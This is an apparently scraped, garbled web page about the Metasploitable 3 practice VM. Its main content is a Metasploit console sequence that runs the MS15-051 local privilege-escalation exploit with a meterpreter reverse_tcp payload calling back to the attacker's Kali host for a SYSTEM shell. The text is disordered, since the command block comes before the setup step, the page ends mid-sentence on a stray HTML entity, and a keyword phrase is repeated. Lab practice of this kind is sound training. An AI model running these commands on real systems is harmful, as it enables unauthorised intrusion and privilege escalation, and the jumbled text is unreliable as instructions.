Metasploitable 3 Ova Guide

meterpreter > background msf6 > use exploit/windows/local/ms15_051_client_copy_image msf6 > set SESSION 1 msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp msf6 > set LHOST <Your Kali IP> msf6 > run

You should now have a SYSTEM level shell. Congratulations—you just compromised a mock corporate server. metasploitable 3 ova

Once you've imported the OVA file, follow these steps to set up Metasploitable 3: background msf6 &gt